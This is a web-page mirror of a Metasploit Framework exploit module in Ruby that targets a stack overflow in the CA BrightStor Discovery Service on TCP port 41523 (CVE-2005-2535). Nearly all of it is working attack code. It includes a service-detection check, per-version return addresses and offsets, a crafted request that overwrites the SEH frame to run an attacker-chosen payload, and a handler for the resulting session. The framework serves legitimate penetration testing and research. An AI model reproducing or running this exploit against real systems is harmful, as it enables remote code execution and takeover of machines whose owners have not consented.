Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/brightstor/discovery_tcp.rb
33022 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = AverageRanking

8


9
  include Msf::Exploit::Remote::Tcp

10
  include Msf::Exploit::Seh

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'CA BrightStor Discovery Service TCP Overflow',

17
        'Description' => %q{

18
          This module exploits a vulnerability in the CA BrightStor

19
          Discovery Service. This vulnerability occurs when a specific

20
          type of request is sent to the TCP listener on port 41523.

21
          This vulnerability was discovered by cybertronic[at]gmx.net

22
          and affects all known versions of the BrightStor product.

23
          This module is based on the 'cabrightstor_disco' exploit by

24
          HD Moore.

25
        },

26
        'Author' => [ 'hdm', 'aushack' ],

27
        'License' => MSF_LICENSE,

28
        'References' => [

29
          [ 'CVE', '2005-2535'],

30
          [ 'OSVDB', '13814'],

31
          [ 'BID', '12536'],

32
          [ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2005-02/0123.html'],

33
          [ 'EDB', '1131']

34
        ],

35
        'Privileged' => true,

36
        'Payload' => {

37
          'Space' => 2048,

38
          'BadChars' => "\x00",

39
          'StackAdjustment' => -3500

40
        },

41
        'Targets' => [

42
          [

43
            'cheyprod.dll 9/14/2000', # Build 1220.0 9/14/2000 7.0.1220.0

44
            {

45
              'Platform' => 'win',

46
              'Ret' => 0x23803b20, # pop/pop/ret

47
              'Offset' => 1032

48
            },

49
          ],

50
          [

51
            'cheyprod.dll 12/12/2003',

52
            {

53
              'Platform' => 'win',

54
              'Ret' => 0x23805714, # pop/pop/ret

55
              'Offset' => 1024

56
            },

57
          ],

58
          [

59
            'cheyprod.dll 07/21/2004',

60
            {

61
              'Platform' => 'win',

62
              'Ret' => 0x23805d10, # pop/pop/ret

63
              'Offset' => 1024

64
            },

65
          ],

66
        ],

67
        'DisclosureDate' => '2005-02-14',

68
        'DefaultTarget' => 1,

69
        'Notes' => {

70
          'Reliability' => UNKNOWN_RELIABILITY,

71
          'Stability' => UNKNOWN_STABILITY,

72
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

73
        }

74
      )

75
    )

76


77
    register_options(

78
      [

79
        Opt::RPORT(41523)

80
      ]

81
    )

82
  end

83


84
  def check

85
    # The first request should have no reply

86
    csock = Rex::Socket::Tcp.create(

87
      'PeerHost' => datastore['RHOST'],

88
      'PeerPort' => datastore['RPORT'],

89
      'Context' =>

90
        {

91
          'Msf' => framework,

92
          'MsfExploit' => self

93
        }

94
    )

95


96
    csock.put('META')

97
    x = csock.get_once(-1, 3)

98
    csock.close

99


100
    # The second request should be replied with the host name

101
    csock = Rex::Socket::Tcp.create(

102
      'PeerHost' => datastore['RHOST'],

103
      'PeerPort' => datastore['RPORT'],

104
      'Context' =>

105
        {

106
          'Msf' => framework,

107
          'MsfExploit' => self

108
        }

109
    )

110


111
    csock.put('hMETA')

112
    y = csock.get_once(-1, 3)

113
    csock.close

114


115
    if (y and !x)

116
      return Exploit::CheckCode::Detected

117
    end

118


119
    return Exploit::CheckCode::Safe

120
  end

121


122
  def exploit

123
    connect

124


125
    print_status("Trying target #{target.name}...")

126


127
    buf = rand_text_english(4096)

128


129
    # Overwriting the return address works well, but the only register

130
    # pointing back to our code is 'esp'. The following stub overwrites

131
    # the SEH frame instead, making things a bit easier.

132


133
    seh = generate_seh_payload(target.ret)

134
    buf[target['Offset'], seh.length] = seh

135


136
    # Make sure the return address is invalid to trigger SEH

137
    buf[900, 100] = (rand(128..254)).chr * 100

138


139
    # SERVICEPC is the client host name actually =P (thanks Juliano!)

140
    req = "\x9b" + 'SERVICEPC' + "\x18" + [0x01020304].pack('N') + 'SERVICEPC' + "\x01\x0c\x6c\x93\xce\x18\x18\x41"

141
    req << buf

142


143
    sock.put(req)

144
    sock.get_once

145


146
    handler

147
    disconnect

148
  end

149
end

150


151